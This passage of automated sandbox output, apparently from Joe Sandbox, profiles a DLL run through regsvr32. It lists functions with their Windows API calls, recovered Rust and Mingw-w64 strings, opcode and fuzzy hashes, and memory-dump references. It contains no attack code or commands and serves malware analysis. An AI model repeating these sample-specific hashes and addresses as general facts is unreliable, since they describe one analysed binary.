Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast$EnvironmentVariable
String ID: at :$<unknown>
API String ID: 3632352037-3657909574
Opcode ID: c0cba90687a0b6fb0a506ff88ba1c6853a0cbbaa6b96057d2cc2ba2423f696e2
Instruction ID: 5b17cf1cfc9d2ed84474b23bf1ae5c7469621fc82256228d3ceb33092455f07d
Opcode Fuzzy Hash: c0cba90687a0b6fb0a506ff88ba1c6853a0cbbaa6b96057d2cc2ba2423f696e2
Instruction Fuzzy Hash: 61423532A09FC1A9EB218F64E8443E937B0FB44798F105129DE8C97B99DF79D689C340

Function 00007FF8A9353DB0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 143COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF8A9353E85
abort.MSVCRT(?,?,?,?,?,?,773E80FC,00000000,00000003,?,00000003,?,00007FF8A931CB1B), ref: 00007FF8A9353E8B
RtlUnwindEx.KERNEL32 ref: 00007FF8A9353FA1

Strings

CCG , xrefs: 00007FF8A9354006
CCG", xrefs: 00007FF8A9353E12
CCG!, xrefs: 00007FF8A9353E78
CCG!, xrefs: 00007FF8A9353DD9
CCG , xrefs: 00007FF8A9353E1E

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3297834124
Opcode ID: 51e58efd0602fbf0329e585e272b66322d8febf7f876c3ec7abdec5a1400d3de
Instruction ID: faa99359f3e7e9751e3556b4fb717568b079ee2ae62053192d631b0eed75f9e0
Opcode Fuzzy Hash: 51e58efd0602fbf0329e585e272b66322d8febf7f876c3ec7abdec5a1400d3de
Instruction Fuzzy Hash: E5519C23A19F81D6E7608F15E4446AE73B0F79DB88F50A226EE8D53758DF38D582C740

Function 00007FF8A9348AC0 Relevance: 16.7, APIs: 11, Instructions: 164fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9348AFD
ReadFileEx.KERNEL32 ref: 00007FF8A9348B58
SleepEx.KERNEL32 ref: 00007FF8A9348B7A
WriteFileEx.KERNEL32 ref: 00007FF8A9348C1C
SleepEx.KERNEL32 ref: 00007FF8A9348C3A
GetLastError.KERNEL32 ref: 00007FF8A9348CF6
CloseHandle.KERNEL32 ref: 00007FF8A9348EDB
CloseHandle.KERNEL32 ref: 00007FF8A9348EE3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFileHandleSleep$ErrorLastReadWritememset
String ID:
API String ID: 78123985-0
Opcode ID: 3b70d7676385697138e4f339739b61284edf89d1cd90e3dde29c634039625ffd
Instruction ID: 6a0fad00c01d91ff10cffc149a8283510fd84e7676015668be66c19e042b2f87
Opcode Fuzzy Hash: 3b70d7676385697138e4f339739b61284edf89d1cd90e3dde29c634039625ffd
Instruction Fuzzy Hash: 5461B322A0EAC2A9E7319F2498017F937B0FF487C9F016135DE6D8BBD9CE7C95858200

Function 00007FF8A9344E00 Relevance: 14.0, APIs: 8, Strings: 1, Instructions: 470COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A9344ECC
memcpy.MSVCRT ref: 00007FF8A934539B
memcpy.MSVCRT ref: 00007FF8A934540F
memcpy.MSVCRT ref: 00007FF8A9345440

Part of subcall function 00007FF8A9349C30: memcpy.MSVCRT ref: 00007FF8A9349D07
Part of subcall function 00007FF8A9349C30: memcpy.MSVCRT ref: 00007FF8A9349D62
Part of subcall function 00007FF8A9349C30: memcpy.MSVCRT ref: 00007FF8A9349D8E
Part of subcall function 00007FF8A9349C30: memcpy.MSVCRT ref: 00007FF8A9349DBE
Part of subcall function 00007FF8A9349C30: memcpy.MSVCRT ref: 00007FF8A9349DE8

Strings

assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF8A934575B

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}
API String ID: 3510742995-2944714439
Opcode ID: 2a2634104855de7466556e4501512c01c0642b6f57403e7fb8a3c4c2d2589a8e
Instruction ID: 93ba693d67a1ec0467b33210056725045cb1e90782d9ade4a8660874523784f5
Opcode Fuzzy Hash: 2a2634104855de7466556e4501512c01c0642b6f57403e7fb8a3c4c2d2589a8e
Instruction Fuzzy Hash: 2C329E32A0AFC195EB61CF24E8403E933B8FB58B88F559236DA8D9B754DF759295C300

Function 00007FF8A93546E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF8A93547FB

Strings

Mingw-w64 runtime failure:, xrefs: 00007FF8A9354717
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF8A9354891
Address %p has no image-section, xrefs: 00007FF8A9354752, 00007FF8A93548A5
VirtualProtect failed with code 0x%x, xrefs: 00007FF8A935486E

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: d4e75093067c1eef3902b7eb05e438d85f7609e9ddf453cf1685e48223be1664
Instruction ID: 58b3cc7389ade399d40882b48d0b8fe36ec969234192393858fb21d56b81ee54
Opcode Fuzzy Hash: d4e75093067c1eef3902b7eb05e438d85f7609e9ddf453cf1685e48223be1664
Instruction Fuzzy Hash: 5F41BE76A0EE82A6EA148F15E4446BA77B0FF89BD4F45A130DA0D87395EE3CE941C740

Function 00007FF8A9349C30 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 219memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A9349D07
memcpy.MSVCRT ref: 00007FF8A9349D62
memcpy.MSVCRT ref: 00007FF8A9349D8E
memcpy.MSVCRT ref: 00007FF8A9349DBE
memcpy.MSVCRT ref: 00007FF8A9349DE8
memcpy.MSVCRT ref: 00007FF8A9349EFA
HeapFree.KERNEL32 ref: 00007FF8A9349FCD

Strings

assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF8A9349FF1

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy$FreeHeap
String ID: assertion failed: new_left_len <= CAPACITY
API String ID: 4250714341-3316943531
Opcode ID: 981a323b5dbb870e5094f0ba1386b4e06bf3b5df5200e711a49cfbd547ee44bf
Instruction ID: d4919644a18bf702d24191d856f3585a621f418b8f0fee3c066f0004bdb18ae9
Opcode Fuzzy Hash: 981a323b5dbb870e5094f0ba1386b4e06bf3b5df5200e711a49cfbd547ee44bf
Instruction Fuzzy Hash: 0FB17026A15BC4A2EB158F18E4443EA77B4FB58B98F45A232DF4D53751EF38E2A5C300

Function 00007FF8A930F090 Relevance: 11.6, APIs: 9, Instructions: 316memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A930F191
memcpy.MSVCRT ref: 00007FF8A930F1A4
HeapFree.KERNEL32 ref: 00007FF8A930F292
HeapFree.KERNEL32 ref: 00007FF8A930F2A3
memcpy.MSVCRT ref: 00007FF8A930F3D4
memcpy.MSVCRT ref: 00007FF8A930F3E7
memcpy.MSVCRT ref: 00007FF8A930F463
HeapFree.KERNEL32 ref: 00007FF8A930F5B9
HeapFree.KERNEL32 ref: 00007FF8A930F5CA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy$FreeHeap
String ID:
API String ID: 4250714341-0
Opcode ID: c31fd265c22ceb8bb203fa1bea40bcd9ba954b131313a70eb03dff8f5241d088
Instruction ID: 5d425d27201130f40f5ca7c84c70bee7a2f4ee6a33f522b4110791c15bfae6f1
Opcode Fuzzy Hash: c31fd265c22ceb8bb203fa1bea40bcd9ba954b131313a70eb03dff8f5241d088
Instruction Fuzzy Hash: ACF19B62A09FD4A5E7059F68E8053F963B4FF48B88F44A221DE8D93765EF38E595C300

Function 00007FF8A9307E80 Relevance: 11.3, APIs: 9, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308277
HeapFree.KERNEL32 ref: 00007FF8A93084E1
HeapFree.KERNEL32 ref: 00007FF8A93084FC
HeapFree.KERNEL32 ref: 00007FF8A9308535
HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 77e2560cebb3281c44c0f2bfa28cf23f69536c80be2580c9db214884d05b71aa
Instruction ID: 9ffdbc09a75033eaab86ac3fc6178b60f748ba7bc5df0558b77a4d9202c71c8c
Opcode Fuzzy Hash: 77e2560cebb3281c44c0f2bfa28cf23f69536c80be2580c9db214884d05b71aa
Instruction Fuzzy Hash: 4B41EA2190EEC2A0F664EF52A4583FA6271FFC87C4F446076D94ECA69ACF7EE044D601

Function 00007FF8A933D070 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A933D159
GetModuleFileNameW.KERNEL32 ref: 00007FF8A933D166
GetLastError.KERNEL32 ref: 00007FF8A933D172
GetLastError.KERNEL32 ref: 00007FF8A933D18B
HeapFree.KERNEL32 ref: 00007FF8A933D20B
GetLastError.KERNEL32 ref: 00007FF8A933D225
HeapFree.KERNEL32 ref: 00007FF8A933D2A6

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorLast$FreeHeap$FileModuleName
String ID:
API String ID: 526635459-0
Opcode ID: 234034aac4a69ad57cd7017add9877d52c49750f1771cf30c797ff67527a0711
Instruction ID: bfc10b45f4256f7aa017702f248fdfc064ded8ee2783cb5aa3f976ab78f466e7
Opcode Fuzzy Hash: 234034aac4a69ad57cd7017add9877d52c49750f1771cf30c797ff67527a0711
Instruction Fuzzy Hash: A3517211A4EFC1AAE7659F62A8043FA22B4FB05BD8F006139ED2DD7785DE7CE2418300

Function 00007FF8A93226E0 Relevance: 10.6, APIs: 7, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c31e509f00780f06ca036e12a6af17234d9f74ca5995cf672fadfd354d7a1c
Instruction ID: 163f14eb9d48b95546bfe4ae22daa1cabc67168701a49e4d9424581016f56606
Opcode Fuzzy Hash: 38c31e509f00780f06ca036e12a6af17234d9f74ca5995cf672fadfd354d7a1c
Instruction Fuzzy Hash: A151AE22A0EB81A9F7259F65E8453E977B0FB583D8F14A134EE8D46B85EF3CD1858340

Function 00007FF8A9354020 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
abort.MSVCRT ref: 00007FF8A93540F5
RaiseException.KERNEL32 ref: 00007FF8A9354132
abort.MSVCRT ref: 00007FF8A9354147

Strings

CCG , xrefs: 00007FF8A935412D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: abort$CaptureContextExceptionRaiseUnwind
String ID: CCG
API String ID: 4122134289-1584390748
Opcode ID: d5e575fdb48f0d82c3a8ee070d6bbe93577a3e9dd477f38d468f4dc00e201611
Instruction ID: 96d4ba0212794da17575913c5dfc609c54c40060118f127af0309dcda57f4a1e
Opcode Fuzzy Hash: d5e575fdb48f0d82c3a8ee070d6bbe93577a3e9dd477f38d468f4dc00e201611
Instruction Fuzzy Hash: 90317E72A09FC586E7209F24E4403AA7771FBDD788F50A226DA8C53769DF79C1A1CB00

Function 00007FF8A932A9D4 Relevance: 10.1, APIs: 8, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932AA2F
HeapFree.KERNEL32 ref: 00007FF8A932AA46
HeapFree.KERNEL32 ref: 00007FF8A932AA65
HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 18f78f09db2722250bfa24791444786fa6145ec8145da0be69ee11e8bbfcefbb
Instruction ID: 5a7f17b9542b7e8ebdb034be118b345bb85523d50c11eeb69dc93013f0226eb8
Opcode Fuzzy Hash: 18f78f09db2722250bfa24791444786fa6145ec8145da0be69ee11e8bbfcefbb
Instruction Fuzzy Hash: 61516F2290EFC1A9F7659F2998453F923B0FF98798F04A132DE4D87796DF399295C200

Function 00007FF8A9308289 Relevance: 10.1, APIs: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A933D2C0: HeapFree.KERNEL32(?,?,?,?), ref: 00007FF8A933D30C

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

HeapFree.KERNEL32 ref: 00007FF8A9308622
HeapFree.KERNEL32 ref: 00007FF8A9308735
HeapFree.KERNEL32 ref: 00007FF8A930874B
HeapFree.KERNEL32 ref: 00007FF8A9308776
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CaptureCloseContextExceptionHandleRaiseUnwindabort
String ID:
API String ID: 245745995-0
Opcode ID: 1640553c8aa3bcfd908af3890faa38e5c099838c3c12a3070ac1cee0db7ce360
Instruction ID: cf7c8c4453003328563a8c46f6d6c7fdfa97d1c411a873547b433bc1385ff686
Opcode Fuzzy Hash: 1640553c8aa3bcfd908af3890faa38e5c099838c3c12a3070ac1cee0db7ce360
Instruction Fuzzy Hash: 69314F2190EEC2A0E664EF52D4143FA62B1EFC87C4F446071DA4ECBA9ADF7EE4449640

Function 00007FF8A930838D Relevance: 10.1, APIs: 8, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308622
HeapFree.KERNEL32 ref: 00007FF8A9308735
HeapFree.KERNEL32 ref: 00007FF8A930874B
HeapFree.KERNEL32 ref: 00007FF8A9308776
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 8fde4531e1a884be5a99b2484af7e0bfdec3953cf9859f7fb4137282dbee6db8
